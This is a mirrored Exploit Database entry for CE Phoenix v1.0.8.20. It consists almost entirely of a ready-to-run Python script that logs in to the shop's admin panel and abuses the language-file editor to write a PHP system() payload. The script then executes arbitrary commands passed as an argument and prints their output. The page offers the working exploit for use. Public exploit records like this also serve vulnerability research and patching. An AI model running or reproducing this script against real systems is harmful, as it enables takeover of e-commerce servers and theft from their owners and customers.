CE Phoenix v1.0.8.20 – Remote Code Execution

• Exploit Database
• 109 阅读

• 作者： tmrswrr
  日期： 2024-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51957/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139

  ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated) #### Date: 2023-11-25 #### Exploit Author: tmrswrr #### Category: Webapps #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/) #### Version: v1.0.8.20 #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)   ## EXPLOIT :   import requests from bs4 import BeautifulSoup import sys import urllib.parse import random from time import sleep   class colors: OKBLUE = &apos;\033[94m&apos; WARNING = &apos;\033[93m&apos; FAIL = &apos;\033[91m&apos; ENDC = &apos;\033[0m&apos; BOLD = &apos;\033[1m&apos; UNDERLINE = &apos;\033[4m&apos; CBLACK = &apos;\33[30m&apos; CRED = &apos;\33[31m&apos; CGREEN = &apos;\33[32m&apos; CYELLOW = &apos;\33[33m&apos; CBLUE = &apos;\33[34m&apos; CVIOLET = &apos;\33[35m&apos; CBEIGE = &apos;\33[36m&apos; CWHITE = &apos;\33[37m&apos;   def entry_banner(): color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE] random.shuffle(color_random)   banner = color_random[0] + """ CE Phoenix v1.0.8.20 - Remote Code Execution \n Author: tmrswrr """ for char in banner: print(char, end=&apos;&apos;) sys.stdout.flush() sleep(0.0045)   def get_formid_and_cookies(session, url): response = session.get(url, allow_redirects=True) if response.ok: soup = BeautifulSoup(response.text, &apos;html.parser&apos;) formid_input = soup.find(&apos;input&apos;, {&apos;name&apos;: &apos;formid&apos;}) if formid_input: return formid_input[&apos;value&apos;], session.cookies return None, None   def perform_exploit(session, url, username, password, command): print("\n[+] Attempting to exploit the target...")   initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php" formid, cookies = get_formid_and_cookies(session, initial_url) if not formid: print("[-] Failed to retrieve initial formid.") return   # Login print("[+] Performing login...") login_payload = { &apos;formid&apos;: formid, &apos;username&apos;: username, &apos;password&apos;: password } login_headers = { &apos;Content-Type&apos;: &apos;application/x-www-form-urlencoded&apos;, &apos;Cookie&apos;: f&apos;cepcAdminID={cookies["cepcAdminID"]}&apos;, &apos;User-Agent&apos;: &apos;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36&apos;, &apos;Referer&apos;: initial_url } login_url = url + "/admin/login.php?action=process" login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)   if not login_response.ok: print("[-] Login failed.") print(login_response.text) return   print("[+] Login successful.")     new_formid, _ = get_formid_and_cookies(session, login_response.url) if not new_formid: print("[-] Failed to retrieve new formid after login.") return   # Exploit print("[+] Executing the exploit...") encoded_command = urllib.parse.quote_plus(command) exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B" exploit_headers = { &apos;Content-Type&apos;: &apos;application/x-www-form-urlencoded&apos;, &apos;Cookie&apos;: f&apos;cepcAdminID={cookies["cepcAdminID"]}&apos;, &apos;User-Agent&apos;: &apos;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36&apos;, &apos;Referer&apos;: login_response.url } exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save" exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)   if exploit_response.ok: print("[+] Exploit executed successfully.") else: print("[-] Exploit failed.") print(exploit_response.text)     final_response = session.get(url) print("\n[+] Executed Command Output:\n") print(final_response.text)   def main(base_url, username, password, command): print("\n[+] Starting the exploitation process...") session = requests.Session() perform_exploit(session, base_url, username, password, command)   if __name__ == "__main__": entry_banner()   if len(sys.argv) < 5: print("Usage: python script.py [URL] [username] [password] [command]") sys.exit(1)   base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] command = sys.argv[4]   main(base_url, username, password, command)